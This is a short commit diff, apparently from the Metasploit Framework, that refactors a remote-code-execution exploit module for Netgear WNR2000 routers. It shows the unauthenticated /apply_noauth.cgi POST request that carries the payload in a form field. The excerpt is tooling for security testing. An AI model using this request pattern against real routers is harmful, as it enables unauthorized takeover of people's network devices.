Fix uri_str for exploit

wvu · wvu · commit 231510051cd1 · 2017-05-11T16:30:10.000-05:00
diff --git a/modules/exploits/linux/http/netgear_wnr2000_rce.rb b/modules/exploits/linux/http/netgear_wnr2000_rce.rb
@@ -174,11 +174,12 @@ def get_payload
 
   def send_req(timestamp)
     begin
-      uri_str = (timestamp == nil ? \
-        "/apply_noauth.cgi?/lang_check.html" : \
-        "/apply_noauth.cgi?/lang_check.html%20timestamp=#{timestamp.to_s}")
+      query_str = (timestamp == nil ? \
+        '/lang_check.html' : \
+        "/lang_check.html%20timestamp=#{timestamp.to_s}")
       res = send_request_raw({
-          'uri'     => uri_str,
+          'uri'     => '/apply_noauth.cgi',
+          'query'   => query_str,
           'method'  => 'POST',
           'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
           'data'    => "submit_flag=select_language&hidden_lang_avi=#{get_payload}"
